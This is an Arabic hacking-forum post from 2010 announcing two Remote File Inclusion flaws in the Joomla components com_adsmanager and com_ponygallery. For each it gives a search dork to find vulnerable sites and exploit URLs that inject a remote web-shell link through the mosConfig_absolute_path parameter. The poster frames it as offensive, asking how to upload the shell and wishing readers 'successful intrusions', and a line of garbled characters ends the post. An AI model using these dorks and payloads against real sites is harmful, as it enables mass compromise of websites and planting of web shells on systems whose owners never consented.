عرض مشاركة واحدة
قديم 12-23-2010, 03:18 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
hacker-10
 
الصورة الرمزية hacker-10
 

 

 
إحصائية العضو






hacker-10 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hacker-10 is on a distinguished road

افتراضي ثغرات جديدة في سكربت Joomla


السلام عليكم ورحمة الله تعالى و بركاته

ظهرت ثغرتان جديدتان في سكريبت joomla

الثغرة الاولى Joomla Component com_adsmanager Remote File Include

تاريخ اكتشاف الثغرة 23/12/2010

مكتشف الثغرة : AtT4CKxT3rR0r1ST

تحميل السكربت : http://downloads.ziddu.com/downloadf...adsmanager.zip

و الآن الشيء المهم

الدورك :
كود PHP:
inurl:"com_adsmanager" 
الاستغلال :

كود PHP:
www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?] 
حيث site.com هو الموقع

و [?shell.txt] هو رابط الشل بصيغة txt
-----------------------------------
الثغرة الثانية
Joomla Component com_ponygallery Remote File Inclusion Vulnerabilities


تاريخ اكتشاف الثغرة 23/12/2010

مكتشف الثغرة AtT4CKxT3rR0r1ST

الدورك

كود PHP:
inurl:"com_ponygallery" 
الاستغلال


كود PHP:
www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?] 
او


كود PHP:
www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?] 
حيث site.com هو الموقع

و [?shell.txt] هو رابط الشل بصيغة txt

شباب لي طلب ...ممكن شرح لكيفية رفع الشل من هذه الثغرة

اختراقات موفقة




eyvhj []d]m td s;vfj Joomla


التعديل الأخير تم بواسطة hacker-10 ; 12-23-2010 الساعة 03:21 PM.

   

رد مع اقتباس